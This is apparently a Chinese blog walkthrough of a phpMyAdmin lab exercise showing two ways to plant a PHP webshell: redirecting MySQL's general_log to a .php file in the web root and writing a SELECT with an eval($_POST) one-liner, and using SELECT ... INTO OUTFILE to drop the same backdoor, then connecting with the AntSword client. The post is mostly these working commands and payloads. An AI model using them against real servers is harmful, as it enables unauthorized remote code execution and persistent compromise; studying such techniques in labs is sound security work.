PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
禾木KG1 小时前
网络安全-等级保护(等保) 3-3 GB/T 36627-2018 《信息安全技术 网络安全等级保护测试评估技术指南》-2018-09-17发布【现行】
网络安全
Le_ee2 小时前
dvwa7——SQL Injection
数据库·sql·网络安全·靶场·token·dvwa
一口一个橘子3 小时前
[ctfshow web入门] web78
前端·web安全·网络安全
Le_ee3 小时前
dvwa5——File Upload
网络安全·靶场·php·靶机·dvwa
pencek4 小时前
HackMyVM-Jabita
网络安全
Le_ee4 小时前
dvwa4——File Inclusion
网络安全·靶场·dvwa
pencek4 小时前
XCTF-web-ics-05
网络安全
网安INF4 小时前
密码学:解析Feistel网络结构及实现代码
java·网络安全·密码学·des·feistel
FGHua_kk6 小时前
CTFHub-RCE 命令注入-过滤运算符
web安全·网络安全·ctfhub
Suckerbin7 小时前
HA: Wordy靶场
笔记·安全·网络安全